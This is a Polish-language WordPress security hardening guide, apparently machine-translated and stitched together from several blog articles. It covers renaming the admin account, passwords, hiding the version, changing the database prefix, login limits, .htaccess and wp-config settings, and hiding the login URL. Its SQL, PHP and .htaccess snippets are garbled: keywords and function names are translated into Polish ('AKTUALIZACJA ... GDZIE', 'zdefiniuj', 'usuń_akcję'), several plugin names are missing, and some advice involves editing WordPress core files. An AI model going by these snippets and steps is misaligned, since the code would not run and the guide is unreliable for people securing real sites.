Z artykułu dowiesz się:

1. Użyj dobrego loginu.

Zabezpieczanie witryny WordPress zaczyna się od czegoś podstawowego — stworzenia dobrego loginu. Podczas instalacji WordPressa użytkownicy często korzystają z loginu, który domyślnie oferuje instalator, a mianowicie – Admin. To właśnie w pierwszej kolejności sprawdzają boty szukające luk w zabezpieczeniach Twojej witryny. Korzystając z tego loginu, udostępniasz już połowę niezbędnych informacji hakerom, a oni muszą jedynie odgadnąć hasło.

Jeśli zainstalowałeś już platformę i pracujesz nad swoją witryną, prawdopodobnie nie będziesz chciał odinstalować instalacji i zacząć od nowa, aby skorzystać z bezpieczniejszego logowania. Jest wyjście:

Krok 1 – Utwórz nowego użytkownika

Zaloguj się do panelu administracyjnego WordPressa i utwórz nowe konto z bardziej złożonym loginem, wyposażone w pełny dostęp do wszystkich funkcji serwisu, czyli uprawnienia administratora.

Z menu głównego po lewej stronie wybierz Użytkownicy >> Dodaj nowy.

Wprowadź wszystkie wymagane informacje dla nowego użytkownika, określając jego rolę jako "Administrator" i naciśnij "Dodaj nowego użytkownika".

Krok 2 – Usunięcie użytkownika admin

Następnie wyloguj się z systemu zarządzania, zaloguj się na nowy konto i usuń użytkownika Admin z systemu w jeden z następujących sposobów:

Metoda 1 – Z menu głównego po lewej stronie wybierz Użytkownicy >> Wszyscy użytkownicy. Najedź kursorem na nazwę użytkownika Admin i zobaczysz tę funkcję "Usuwać".

Metoda 2 - Z menu głównego po lewej stronie wybierz Użytkownicy >> Wszyscy użytkownicy. Znajdź użytkownika Admin, zaznacz i z menu rozwijanego "Działania" wybierać "Usuwać". Następnie kliknij opcję "Stosować" poniżej listy użytkowników. Ta opcja jest wygodna, jeśli chcesz usunąć kilku użytkowników jednocześnie.

Możesz także zmienić nazwę użytkownika administratora poprzez zapytanie do bazy danych:
AKTUALIZACJA wp_users SET user_login = 'new_login' GDZIE user_login = 'admin';

Ta metoda ma wadę: autor dotyczy postów napisanych przez użytkownika Admin, nie ulegnie zmianie. Aby to naprawić, musisz wykonać kolejne zapytanie do bazy danych:
AKTUALIZACJA wp_posts SET post_author = 'new_login' GDZIE post_author = 'admin';

2. Użyj złożonego i unikalnego hasła.

Ochrona administratora WordPressa jest oczywiście niemożliwa bez silnego, dobrego hasła. Ważne, aby był unikalny i zawierał cyfry, litery różnych przypadków, znaki interpunkcyjne, symbole itp. Hasła takie jak: pass, 1q2w3e4r5t6y, 87654321, qwerty, abc123, 111111, 1234, Twoja data urodzenia itp. – nie są niezawodne, ale wielu użytkowników nadal z nich korzysta. Przykład dobrego hasła: pcVaOF8r39. Oczywiście zapamiętanie takiego hasła będzie trudne, ale w tym celu istnieje wiele programów przechowujących i generujących hasła, które można również zintegrować z interfejsem przeglądarki (na przykład Password Agent, KeyPass, RoboForm itp.)

Jeśli nadal chcesz zapamiętać swoje hasła, zalecamy utworzenie hasła złożonego z nazwy/słowa, które znasz, z kilkoma dużymi literami/cyframi w losowych miejscach i kilkoma znakami specjalnymi na początku lub na końcu. Takie hasło również będzie trudne do odgadnięcia, ale dość łatwe do zapamiętania.

Pamiętaj o regularnej aktualizacji haseł.

3. Zaktualizuj swoją wersję WordPressa.

WordPress dba o swoich użytkowników, dlatego w panelu administracyjnym znajdziesz powiadomienia o wylogowaniu Nowa wersja. Zalecamy aktualizację natychmiast po jej zobaczeniu, ponieważ wykorzystuje ona jedną z najczęstszych luk w zabezpieczeniach Twojej witryny przestarzała wersja platformy.

4. Ukryj wersję WordPress.

WordPress domyślnie dodaje bieżący numer wersji do źródło Twoje pliki i strony. A ponieważ dość często nie zawsze jest możliwa aktualizacja wersji WordPressa na czas, może się to zdarzyć słaby punkt Twoja strona internetowa. Wiedząc, jaką wersję WordPressa posiadasz, haker może wyrządzić wiele szkód.

Korzystanie z pliku funkcje.php Możesz zapobiec wyświetlaniu informacji o wersji Twojej platformy. Aby to zrobić, musisz otworzyć plik funkcje.php, znajdujący się w folderze głównym bieżącego motywu Twojej witryny (wp-content/themes/current_theme_wordpress) i dodaj następujący kod:
usuń_akcję('wp_head', 'wp_generator');

Możesz też dodać następujący kod do pliku funkcje.php:

/* Ukryj ciągi wersji WP przed skryptami i stylami
* @return (string) $źródło
* @filter script_loader_src
* @filter style_loader_src
*/
funkcja fjarrett_remove_wp_version_strings($src) (
globalna $wp_version;
parse_str(parse_url($src, PHP_URL_QUERY), $zapytanie);
if (!empty($query[‚ver’]) && $query[‚ver’] === $wp_version) (
$src = usuń_query_arg('ver', $src);
}
zwróć $źródło;
}
add_filter('script_loader_src', 'fjarrett_remove_wp_version_strings');
add_filter('style_loader_src', 'fjarrett_remove_wp_version_strings');

/* Ukryj ciągi wersji WP w metatagu generatora */
funkcja wpmudev_remove_version() (
powrót ";
}
add_filter('generator', 'wpmudev_remove_version');

Oprócz powyższego w dowolnym folderze motywów WordPress znajdziesz nagłówek.php plik. Wskazuje również wersję Twojej instalacji, co jest bardzo interesujące dla hakera, jak wspomniano wcześniej. Usuwając z pliku poniższą linię pozbędziesz się niepotrzebnych informacji:

” />

5. Pobieraj motywy i wtyczki z wiarygodnych źródeł.

WordPress jest na tyle powszechny, że coraz więcej programistów tworzy dla niego gotowe motywy i wtyczki. O ile większość z nich ułatwi korzystanie z Twojej witryny i rozszerzy jej funkcjonalność, niektóre mogą ukryć bardzo nieprzyjemne konsekwencje w postaci wirusów i otworzyć drzwi hakerom. Do pobierania motywów i wtyczek używaj wyłącznie zaufanych zasobów, na przykład wordpress.org, a także zwracaj uwagę na wszelkie pojawiające się ostrzeżenia o złośliwych plikach. Podobnie jak w przypadku samego WordPressa, ważne jest, aby aktualizować wtyczki do najnowszych wersji.

6. Nie przechowuj niepotrzebnych plików.

Nieaktywne rozszerzenia mogą stanowić poważne zagrożenie dla bezpieczeństwa Twojej witryny. Dlatego możesz usunąć wszystkie nieużywane wtyczki i motywy. Na przykład zainstalowałeś go w celu przetestowania i wybrania tego, którego będziesz używać. Po wybraniu nie zapomnij usunąć wszystkich niepotrzebnych.

7. Regularnie skanuj swój komputer lokalny w poszukiwaniu wirusów.

Podejmowanie różnych kroków w celu zabezpieczenia witryny WordPress jest dobre, ale musisz także mieć oko na swój komputer. Musisz mieć zainstalowany stale aktualizowany program antywirusowy. W przeciwnym razie ryzykujesz zainfekowaniem swojej witryny internetowej, przesyłając do niej pliki wirusów.

8. Zrób kopie zapasowe witryny.

Nie wszystkim złośliwym atakom można zapobiec, ale tylko jeden udany atak może zniweczyć wszelkie wysiłki podejmowane w Twojej witrynie. Zalecamy regularne wykonywanie kopii zapasowych swojej witryny. Wiele firm hostingowych udostępnia opcję tworzenia kopii zapasowych serwerów i jeśli coś się stanie, możesz przywrócić witrynę z kopii, która jest dostępna na serwerze.

Instalując wtyczkę WordPress Database Backup, możesz jeszcze bardziej zabezpieczyć bazę danych swojej witryny. W ustawieniach wtyczki możesz ustawić opcję wysyłania codziennej kopii zapasowej bazy danych na skrzynkę kontaktową.

9. Korzystaj z bezpiecznego połączenia.

Jeśli wolisz przesyłać pliki za pomocą klienta FTP, użyj bezpiecznego protokołu połączenia z serwerem SFTP.

10. Utwórz plik .htaccess.

Kod zabezpieczający przed hotlinkowaniem:

Przepisz silnik włączony
PrzepiszWarunek %(HTTP_REFERER) !^http://(.+\.)?twojadomena\.com/
PrzepiszWarunek %(HTTP_REFERER) !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

Hotlinkowanie to wstawianie obrazu z Twojego serwera na cudzą witrynę/blog. Ruch trafia bezpośrednio do Twojego serwera.

Za pomocą powyższego kodu możesz zmusić serwer do sprawdzenia, skąd dokładnie przyszło żądanie: jeśli ze stron Twojej witryny, to serwer bez problemu zwróci obraz użytkownikowi; jeśli pochodzi z czyjejś witryny, wyświetla obraz z błędem.

11. Zmień przedrostek tabel bazy danych.

Ochrona WordPressa przed hakerami zostanie również ulepszona, jeśli zostanie usunięty początkowy przedrostek. wp_ — Dzięki temu atakującym będzie trudniej Cię znaleźć. Rozważmy kilka sposobów:

Metoda 1 – Nadaje się do nowych instalacji za pośrednictwem Softaculous
Jeśli Twój dostawca usług hostingowych pozwala na użycie skryptu Softaculous do instalacji WordPressa, możesz zmienić prefiks podczas pierwszej instalacji: w sekcji Opcje zaawansowane będziesz musiał wprowadzić wymagane zmiany.

Metoda 2 – Dla już działających witryn i świeżych instalacji WordPress
Jeśli Twój WordPress jest zainstalowany od dawna, a strona działa, możesz zmienić prefiks za pomocą programu phpMyAdmin.

Wybierz żądaną bazę danych z listy i wykonaj następujące zapytanie do bazy danych:

ZMIEŃ NAZWĘ tabeli `wp_commentmeta` NA `newprefix_commentmeta`;
ZMIEŃ NAZWĘ tabeli `wp_comments` NA `newprefix_comments`;
ZMIEŃ NAZWĘ tabeli `wp_links` NA `newprefix_links`;
ZMIEŃ NAZWĘ tabeli `wp_options` NA `newprefix_options`;
ZMIEŃ NAZWĘ tabeli `wp_postmeta` NA `newprefix_postmeta`;
ZMIEŃ NAZWĘ tabeli `wp_posts` NA `newprefix_posts`;
ZMIEŃ NAZWĘ tabeli `wp_terms` NA `newprefix_terms`;
ZMIEŃ NAZWĘ tabeli `wp_term_relationships` NA `newprefix_term_relationships`;
ZMIEŃ NAZWĘ tabeli `wp_term_taxonomy` NA `newprefix_term_taxonomy`;
ZMIEŃ NAZWĘ tabeli `wp_usermeta` NA `newprefix_usermeta`;
ZMIEŃ NAZWĘ tabeli `wp_users` NA `newprefix_users`;

Gdzie „nowyprzedrostek_” należy zastąpić nowym przedrostkiem, którego chcesz używać zamiast przedrostka „wp_”.

Następnie zobaczysz nowy przedrostek w tabelach bazy danych:

Aby mieć pewność, że wszystkie zmiany powiodły się i przedrostek wp_ nie jest już używany w tabeli _opcje I _metaużytkownika, będziesz musiał wykonać kolejne zapytanie do bazy danych:

WYBIERZ * Z `newprefix_options` GDZIE `nazwa_opcji` LIKE '%wp_%'

WYBIERZ * Z `newprefix_usermeta` GDZIE `meta_key` LIKE '%wp_%'

W rezultacie możesz znaleźć wiele prefiksów, których nazwę będziesz musiał zmienić ręcznie za pomocą przycisku Zmiana:

Liczba zmian, które będziesz musiał wprowadzić, może się różnić. Ale wszystkie przedrostki wp_ aby strona działała prawidłowo, musisz zmienić prefiks na nowy.

Następnie nie zapomnij wprowadzić zmian w przedrostku wp-config.php plik:

Do zmiany prefiksu bazy danych możesz także użyć specjalnych wtyczek: Zmień prefiks bazy danych lub Zmień prefiks tabeli.

12. Ogranicz liczbę prób dostępu.

Najczęściej osoby atakujące podejmują ogromną liczbę prób wejścia na Twoją witrynę, odgadując Twoje hasło. Możesz skonfigurować system tak, aby blokował adres IP na kilka godzin po określonej liczbie nieudanych prób logowania.

Można w tym celu skorzystać z dodatkowych wtyczek, np. Login LockDown czy Limit Login Attempts. W ustawieniach tych wtyczek możesz samodzielnie ustawić liczbę prób logowania oraz czas blokady.

Dodatkowo istnieje możliwość ukrycia wyświetlania komunikatu o błędnym wprowadzonym loginie i haśle. W końcu jest to również informacja, która może pomóc atakującemu.

Aby ukryć ten komunikat, musisz otworzyć plik funkcje.php, znajdujący się w bieżącym folderze motywu Twojej witryny (wp-content/themes/current_theme_WordPress) i dodaj ten kod:
add_filter('błędy_logowania', utwórz_funkcję('$a', "return null;"));

13. Usuń pliki Readme.html i License.txt.

Pliki readme.html i licencji.txt znajdują się w folderze głównym każdej instalacji WordPress. Te pliki nie są dla Ciebie przydatne, ale mogą dostarczyć hakerom dowodów na ich zbrodnie. Na przykład, aby sprawdzić aktualną wersję WordPressa i wiele innych przydatnych rzeczy do włamania się na stronę internetową. Zalecamy usunięcie ich natychmiast po zainstalowaniu WordPressa.

14. Korzystaj z certyfikatu SSL.

Aby przesyłać chronione informacje i zachować poufność wymiany danych, zalecamy korzystanie z protokołu SSL. Dotyczy to szczególnie sklepów internetowych, jeśli nie chcesz, aby dane osobowe Twoich klientów były przesyłane w sposób niezabezpieczony.

Przede wszystkim musisz zainstalować go dla swojej nazwy domeny.

Następnie możesz ustawić obowiązkowe użycie protokołu SSL podczas logowania do panelu sterowania swojej witryny. Aby to zrobić, otwórz wp-config.php plik znajdujący się w folderze głównym Twojej witryny i dodaj następujący wiersz:
zdefiniuj('FORCE_SSL_ADMIN', prawda);

15. Edytuj plik wp-config.php.

Dodając ten kod do wp-config.php możesz także wzmocnić ochronę swojej witryny:

Ograniczenia dotyczące zmian w motywie i wtyczkach:
zdefiniuj('DISALLOW_FILE_EDIT', prawda);

Wyłączenie możliwości instalowania i usuwania wtyczek:
zdefiniuj('DISALLOW_FILE_MODS', prawda);

Dodanie kluczy solnych lub tak zwanych kluczy bezpieczeństwa: najpierw musisz znaleźć takie linie wp-config.php plik:

Zobaczysz, że klucze są już zainstalowane i można je zmienić. Możesz też zobaczyć następujące linie: „umieść tutaj swoją unikalną frazę”, co oznacza, że ​​klucze nie zostały jeszcze zainstalowane:
/**#@+
* Unikalne klucze i sole uwierzytelniające.
*
* Zmień je na różne unikalne frazy!
* Możesz je wygenerować za pomocą usługi tajnego klucza (@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org)
* Możesz je zmienić w dowolnym momencie, aby unieważnić wszystkie istniejące pliki cookie. Zmusi to wszystkich użytkowników do ponownego zalogowania się.
*
* @od wersji 2.6.0
*/
zdefiniuj('AUTH_KEY', 'umieść tutaj swoją unikalną frazę');
zdefiniuj('SECURE_AUTH_KEY', 'umieść tutaj swoją unikalną frazę');
zdefiniuj('LOGGED_IN_KEY', 'umieść tutaj swoją unikalną frazę');
zdefiniuj („NONCE_KEY”, „umieść tutaj swoją unikalną frazę”);
zdefiniuj('AUTH_SALT', 'umieść tutaj swoją unikalną frazę');
zdefiniuj („SECURE_AUTH_SALT”, „umieść tutaj swoją unikalną frazę”);
zdefiniuj('LOGGED_IN_SALT', 'umieść tutaj swoją unikalną frazę');
zdefiniuj („NONCE_SALT”, „umieść tutaj swoją unikalną frazę”);

Chciałbym osobno wspomnieć o niektórych wtyczkach:

Jest to wtyczka bezpieczeństwa WordPress, która umożliwia skanowanie witryny pod kątem złośliwego kodu, luk i luk pozostawionych przez hakerów, wyświetlając w czasie rzeczywistym analizę witryny i ruchu. Możliwe jest również skonfigurowanie automatycznego skanowania i wiele więcej.

Ta wtyczka sprawdza Twoją witrynę pod kątem różnych luk w zabezpieczeniach i oferuje szereg metod ich naprawienia. Na przykład hasła, różne prawa dostępu do plików, ochrona baz danych, ochrona informacji o wersji WordPress, ochrona administratora itp.

Ta wtyczka pozwala zabezpieczyć konta użytkowników i loginy, bazy danych i systemy plików, zapobiegać atakom typu brute-force (ataki polegające na zgadywaniu hasła), skanować witrynę itp.

Choć może to zabrzmieć smutno, ochrona WordPressa to skomplikowana sprawa, a metody opisane w tym artykule nie gwarantują w 100%, że Twoja witryna będzie całkowicie chroniona przed wszelkimi działaniami oszustów. Nie należy ich jednak zaniedbywać, ponieważ znacznie zmniejszą one możliwość włamania się hakerów na witrynę.

WordPress jest bardzo popularnym CMS-em, to niewątpliwie jego zaleta, do każdego zadania jest wiele wtyczek, ale to też jest jego słabość, bo im bardziej popularny CMS dla strony, tym więcej jest na nią ataków, a raczej tak jest bardziej interesujące dla atakującego, ponieważ po znalezieniu luki w WordPressie atakującym stają się dostępne setki tysięcy witryn, dlatego ochrona Twojej witryny WordPress wymaga szczególnej uwagi.

Dlaczego witryny WordPress są atakowane przez hakerów?

Wszystkie popularne CMS (silniki stron internetowych) są hackowane, a WordPress nie jest wyjątkiem, hakuję głównie za pomocą tzw. programów (skryptów) - exploitów, aby przejąć kontrolę nad witryną, robię to głównie w celu tworzenia linków z Twojej witryny do innych zasobów oraz stworzyć BotNet, który przeprowadza ataki DDoS na inne serwery, podczas gdy witryna pozostaje sprawna i nigdy gołym okiem nie widać, że jest zainfekowana. W każdym razie włamanie będzie miało zły wpływ na Twoją witrynę i możesz nawet zniknąć z wyników wyszukiwania.

Jak już powiedziałem, włamanie następuje automatycznie, identyfikacja CMS witryny nie jest trudna, jest do tego wiele usług online, często program atakujący próbuje odgadnąć hasło z części administracyjnej witryny, tj. idzie na adres twoja-site.ru/wp-admin i próbuje odgadnąć hasło dla twojego użytkownika, znalezienie nazwy użytkownika nie jest trudne, piszesz pod nią artykuły, więc login będzie widoczny dla botów, oni wiedzą, gdzie Szukaj tego. chyba że oczywiście zamknąłeś go za pomocą wtyczki, o której porozmawiamy poniżej. Hasło dla administratora strony powinno być bardzo złożone, ale nawet jeśli ten warunek jest spełniony, nie możesz pozwolić botom na wypróbowanie (brute force) hasła do „panelu administracyjnego”, ponieważ nie jest to konieczne obciążenie serwera, wyobraź sobie, że Robi to kilkadziesiąt botów z różnych części świata.

Wtyczka chroniąca WordPress przed atakami

Przejdźmy od razu do wtyczki, jest kilka wartych rozważenia, porozmawiajmy o prostszej i bardziej zrozumiałej, używam jej w wielu moich projektach, dla klientów bardzo dobrze radzi sobie z powierzonymi zadaniami ochrony strony -

Ta wtyczka jest dość łatwa do nauczenia i jest w 90% zrusyfikowana, instaluje się ją jak każdą wtyczkę z repozytorium WordPress, po instalacji należy ją aktywować i dokonać podstawowych ustawień. Pojawia się w menu głównym w obszarze administracyjnym WordPress

Panel sterowania wtyczki zabezpieczającej WP

Po przejściu do ustawień wtyczki trafiamy do panelu sterowania. Tutaj możesz dokonać podstawowych ważnych ustawień.

1. Pokazuje ostatnie 5 autoryzacji w Twoim panelu administracyjnym, podany jest użytkownik i adres IP, np. od razu widzę moje adresy IP, są ich tylko dwa, więc nie mam wątpliwości, że ktoś inny zna moje hasło od strony administracyjnej.
2. Sekcja najważniejszych funkcji, tutaj musisz uwzględnić wszystko i ze wszystkim się zgodzić.
3. Wtyczka może śledzić zmiany plików na hostingu i może wysłać Ci raport e-mailem, a Ty zawsze wiesz, jakie pliki się zmieniły, jest to bardzo przydatne, jeśli zostanie pobrany jakiś skrypt lub dowolny plik ze złośliwym kodem, natychmiast zobaczysz to w raporcie, jedynym minusem jest to, że po aktualizacji innych zainstalowanych wtyczek lub samego silnika WordPress, WP Security zobaczy wszystkie te zmiany i wyśle ​​​​Ci ogromną listę, ale możesz uzyskać przyzwyczajony do tych raportów, ponieważ wiesz, kiedy sam aktualizowałeś pliki.
4. Ten element zmienia standardowy adres panelu administracyjnego witryny yoursite.ru/wp-admin na yoursite.ru/luboe-slovo, co uratuje Twój panel administracyjny przed niektórymi potencjalnymi hakerami i botami, ale niestety nie przed wszystkimi , szczególnie zaawansowani wciąż go znajdują, mogę to ocenić, przeglądając sekcję „Autoryzacje”, ale o tym później.
5. Pozycję tę należy wyłączyć, jak na zrzucie ekranu, jest ona potrzebna tylko wtedy, gdy chcesz poddać witrynę konserwacji, odwiedzający otrzymają znak z komunikatem, że strona jest w trakcie prac technicznych, czasami jest to przydatne np. , zmieniając projekt witryny lub w przypadku niektórych zmian globalnych, nie zapominaj, że w tym trybie roboty wyszukiwania również nie mogą przeglądać Twojej witryny, nie zamykaj jej na dłuższy czas.

Ochrona obszaru administracyjnego WordPress przed odgadnięciem hasła

Przejdźmy teraz do pozycji menu - Autoryzacja moim zdaniem bardzo przydatna pozycja i warto ją ustawić, tak jak jest na jednej z moich stron. przy frekwencji około 1000 osób wtyczka wychwytuje dziennie dziesiątki prób odgadnięcia hasła do panelu administracyjnego i dodaje adresy IP hakerów na czarną listę, czyli tzw. blokuje go całkowicie, witryna przestaje odpowiadać na ten adres IP, tym samym niwelując próby znalezienia hasła, ustawienia, które dokonuję na ekranie.

1. Liczbę prób „popełnienia błędu” pozostawiam na poziomie -3, nie rób mniej, możesz sam wpisać błędnie hasło i wylądować na czarnej liście z Twoim adresem IP, będziesz musiał
2. Jest to czas, po którym resetowany jest licznik błędnych prób logowania.
3. Ustawiam dłuższy okres blokady dla adresów IP, od których podejmowano błędne próby autoryzacji, w minutach, tj. kąpać się długo, na zrzucie ekranu widać 6 000 000 minut, czyli około 11 lat, myślę, że to wystarczy

Wszystkim zablokowanym adresom IP zostanie odmówiony dostęp nie tylko do panelu administracyjnego, ale do całej witryny, pamiętaj o tym

Lista zablokowanych adresów IP

1. adres IP atakującego
2. nawiasem mówiąc, login, dla którego wybrano hasło, jest poprawny
3. datę dokonania automatycznego zablokowania

Biała lista adresów dla panelu administracyjnego

Aby umożliwić dostęp do części administracyjnej witryny WordPress tylko z określonych adresów IP, możesz aktywować białą listę adresów w ustawieniach wtyczki.

1. aktywowanie tej opcji
2. oto twój aktualny adres IP
3. w tym polu należy wpisać wszystkie adresy IP, z których dozwolony jest dostęp do panelu administracyjnego

Jeśli chcesz podać zakres adresów IP to zamiast liczby użyj gwiazdki, np. 192.168.5.* - ten projekt umożliwi dostęp do panelu administracyjnego WordPressa ze wszystkich adresów IP zaczynających się od tych numerów, ta metoda może przyda się tym, którzy nie mają dedykowanego adresu IP, a on się ciągle zmienia, np. podczas pracy z mobilnym Internetem z reguły zakres będzie mieścić się w dwóch pierwszych cyfrach, np. 192.168.* .*

Czas czytania: 4 min

Jeszcze rok temu obciążenie mojego serwera bardzo często przekraczało limit dozwolony przez taryfę. Co więcej, problem nie tkwił w samych witrynach, ale w banalnym ataku atakujących na panel administracyjny w celu uzyskania dostępu do własnych celów.

Dziś opowiem Wam jak sobie poradziłam z problemem, co radzę na wszelki wypadek zrobić w domu.

W efekcie zdecydowano się zmienić adres formularza logowania w panelu administracyjnym, a także zamknąć panel administracyjny dla wszystkich obcych osób, które nie mają mojego IP.

Warto zauważyć, że niektóre firmy hostingowe same automatycznie utworzyły nowy adres administratora dla wszystkich użytkowników. Jeżeli korzystasz z usług takich serwisów hostingowych to nie czytaj dalszych artykułów i nie trać czasu.

Jak zmienić adres administratora WordPress

Już wcześniej publikowałem taki artykuł. Wydaje się, że tutaj wynik jest podobny, ale efekt i cel są inne.

Nie zapomnij o zrobieniu kopii zapasowych plików, z którymi pracujesz.

• Najpierw skopiuj plik wp-login.php z katalogu głównego witryny (gdzie znajduje się wp-config.php) przez FTP na swój komputer.
• Zmień nazwę, jak chcesz. Na przykład vhod.php
• Otwórz ten plik darmowym programem Notepad++ (lub innym, wygodniejszym do edycji) i zamień wszystkie wystąpienia frazy wp-login.php na vhod.php .

Możesz to szybko zrobić, naciskając CTRL+F w Notepad++. Cóż, w wyświetlonym oknie wpisz:

Zatem w ciągu sekundy zastąpiłem wystąpienie potrzebnej mi frazy w całym pliku. Pojawiło się 12 razy.

Wrzucamy nowy plik na FTP.

Podobną czynność należy wykonać w pliku general-template.php, który znajdziesz w folderze wp-includes na ftp. Te. zmień wystąpienie frazy wp-login.php na vhod.php , ale nie zmieniaj samej nazwy pliku!

Teraz masz plik .htaccess w katalogu głównym witryny. Kopiujemy go również na nasz komputer i otwieramy do edycji (można użyć zwykłego Notatnika Windows). Wstawiamy fragment kodu, który blokuje każdemu dostęp do pliku wp-login.php

Zamów odmowę, zezwól na odmowę wszystkim

< Files wp - login . php > Zamówienie Odmów, Zezwól Odmowa od wszystkich < / Files >

To właśnie ten krok odciążył ciężar, a także ukrył formularz autoryzacji. Obciążenie zostało odciążone poprzez wstawienie prezentowanego kodu do .htaccess: jeśli nastąpiłoby wywołanie http://site.ru/wp-login.php, wyświetliłoby się błąd 403, a nie 404.

Powtórzmy krótko algorytm działania:

• Zmień nazwę pliku wp-login.php na dowolną nazwę i zastąp wystąpienia tej nazwy nową.
• Podobnie w pliku general-template.php zastępujemy starą nazwę wp-login.php nową.
• Rejestrujemy w pliku .htaccess zakaz dostępu do wp-login.php dla wszystkich

Po aktualizacji WordPressa do poprawienia pozostaje już tylko plik general-template.php. Ale ponieważ Silnik nie jest zbyt często aktualizowany - to drobnostka w porównaniu z efektem.

Ustawiamy ograniczenie logowania poprzez IP poprzez .htaccess

Jako dodatkowe zabezpieczenie serwisu przyjąłem ograniczenie możliwości logowania się do panelu administracyjnego poprzez adres IP. Problem został rozwiązany w bardzo prosty sposób: utwórz pusty plik .htaccess i dodaj do niego następujący kod

zamów odmowę, zezwól na zezwolenie z 192.168.0.1 odmów wszystkim

rozkaz odmówić, pozwolić zezwól od 192.168.0.1 Odmowa od wszystkich

Zapisujemy plik i upuszczamy go do folderu wp-admin w tym samym miejscu w katalogu głównym witryny.

Zamiast mojego IP z przykładu podaj swoje prawdziwe. Co więcej, możesz dodać kilka adresów IP, każdy z nową linią:

zamów odmowę, zezwól zezwól od 126.142.40.16 zezwól od 195.234.69.6 odmów wszystkim

rozkaz odmówić, pozwolić zezwól od 126.142.40.16 zezwól od 195.234.69.6 Odmowa od wszystkich

Jeśli adres IP jest dynamiczny, możesz wpisywać liczby tylko do pierwszej, drugiej lub trzeciej kropki:

Prawdopodobnie wiesz już, jak dostać się do obszaru administracyjnego WordPressa?

Możesz to zrobić na co najmniej cztery sposoby, dodając do adresu swojej witryny następujący wpis:

1. /admin, tj. w ten sposób: http://twojastrona/admin
2. /wp-admin
3. /Zaloguj sie
4. /wp-login.php

Ogólnie rzecz biorąc, wszystkie trzy pierwsze opcje przekierowania nadal będą prowadzić Cię do strony: http://twoja_strona/wp-login.php

Okazuje się, że każdy może dodać dowolny z czterech opisanych powyżej prefiksów do adresu swojej witryny i zobaczy login administratora:

Oczywiście nie oznacza to wcale, że każdy może łatwo dostać się do panelu administracyjnego, ponieważ musi także znać Nazwę Użytkownika lub Twój adres e-mail i hasło.

Jeśli Twój administrator ma login: – to nie jest to wcale rozważne z Twojej strony, a atakujący będzie musiał jedynie odgadnąć lub odgadnąć Twoje hasło.

Dodatkowo widziałeś napis: Nazwa użytkownika czy e-mail? Tak, tak, WordPress może używać adresu e-mail jako nazwy użytkownika. Możesz jednak wskazać adres e-mail gdzieś na stronie, który odpowiada adresowi e-mail administratora. Okazuje się, że pierwszą rzeczą, jaką może spróbować atakujący, jest wprowadzenie Twojego adresu e-mail, a następnie WordPress ponownie mu pomoże, ponieważ jeśli adres e-mail nie będzie odpowiedni, zobaczy następujący komunikat:

i jeśli adres e-mail jest poprawny, WordPress napisze, że hasło do niego jest nieprawidłowe:

W rezultacie mamy do czynienia z sytuacją, w której potencjalny atakujący, aby zhakować Twoją witrynę (dostęp do panelu administracyjnego), będzie musiał jedynie odgadnąć lub odgadnąć Twoje hasło.

Jak chronić login administratora przed potencjalnym zagrożeniem? Odpowiedź jest prosta - spróbuj zwiększyć liczbę niewiadomych wymaganych do wejścia.

Przyjrzyjmy się teraz bliżej:

1. Jeśli to możliwe, upewnij się, że adres e-mail użytkownika administratora nie jest wymieniony nigdzie na stronie - publiczny adres e-mail powinien być inny.
2. Twoje hasło nie powinno być proste, gdy instalacja WordPressa sama generuje dla Ciebie złożone hasło, jeśli nie chcesz go używać, wymyśl jakieś mniej lub bardziej skomplikowane hasło, zawierające małe i duże znaki, cyfry i niektóre symbole, takie jak -, ?, _ itp.
3. Twoja nazwa użytkownika również nie powinna być prosta: administrator, menedżer, root, administrator, użytkownik i inne proste słowa!
4. I na koniec musisz wprowadzić trzecią najważniejszą niewiadomą - zmienić adres URL logowania administratora, w tym celu zainstaluj prostą wtyczkę: WPS Hide Login

WPS Ukryj login

Prosta, darmowa i dość popularna wtyczka pozwalająca na zmianę adresu URL logowania administratora.

Po zainstalowaniu i aktywowaniu wtyczki należy przejść do sekcji administracyjnej: Ustawienia / Ogólne, następnie przewiń na sam dół strony i zobacz tylko jeden parametr dodany przez tę wtyczkę:

Domyślnie wtyczka sugeruje użycie loginu http://twojastrona/login - jednak nie jest to bynajmniej najlepsza opcja! Wymyśl coś własnego, np.: yyy12_go)))

Po zmianie tego parametru nie zapomnij kliknąć przycisku Zapisz zmiany– w przeciwnym razie, przy aktywnej wtyczce, będziesz miał możliwość logowania się poprzez http://twojastrona/login

Pamiętaj, aby spróbować wylogować się i zalogować ponownie do obszaru administracyjnego, ale używając nowego adresu logowania, który sam wymyśliłeś, i co najważniejsze, nie zapomnij o tym!

Po zmianie punktu wejścia administratora, podczas próby uzyskania dostępu do standardowych adresów URL, użytkownik otrzyma stronę błędu 404.

Uwaga! Jeśli nagle zapomnisz nowy adres logowania administratora, będziesz musiał wyłączyć tę wtyczkę. Można to zrobić bez wchodzenia do panelu administracyjnego, jeśli masz dostęp do folderów i plików witryny. Wystarczy zmienić nazwę lub usunąć folder wtyczki wps-ukryj logowanie, który będzie w folderze wtyczki(folder wtyczek znajduje się w folderze wp-content).

W rezultacie: po zastosowaniu wszystkich powyższych środków powinniśmy otrzymać ochronę logowania administratora z trzema niewiadomymi: e-mailem/nazwą użytkownika, złożonym hasłem i naszym własnym, unikalnym adresem URL logowania - a to może znacznie skomplikować wysiłki młodych hakerów)

Witam, drodzy czytelnicy bloga. Dzisiaj chcę porozmawiać o bezpieczeństwie pracy i niektórych metodach ochrony strony internetowej przed włamaniami. Niestety nie jestem ekspertem w tej dziedzinie i moja wiedza nie wykracza poza zakres artykułu, ale opiszę po prostu moje ostatnie doświadczenia. Nie używałem niczego skomplikowanego, ale mam nadzieję, że zwiększy to bezpieczeństwo pracy z moimi stronami.

To jest o podwójne uwierzytelnienie, aby zalogować się do panelu administracyjnego silnika Twoja witryna (powinna działać na dowolnym systemie CMS, ale osobiście testowałem ją tylko na WordPress i Joomla). Ochrona instalowana jest na poziomie serwera, więc wszelkie próby odgadnięcia hasła do panelu administracyjnego (brute force) nie spowodują zwiększonego obciążenia hostingu i dość trudno je ominąć. Jest łatwy w instalacji (dosłownie w kilku krokach) i wymaga jedynie uwagi i możliwości dostępu do strony poprzez FTP.

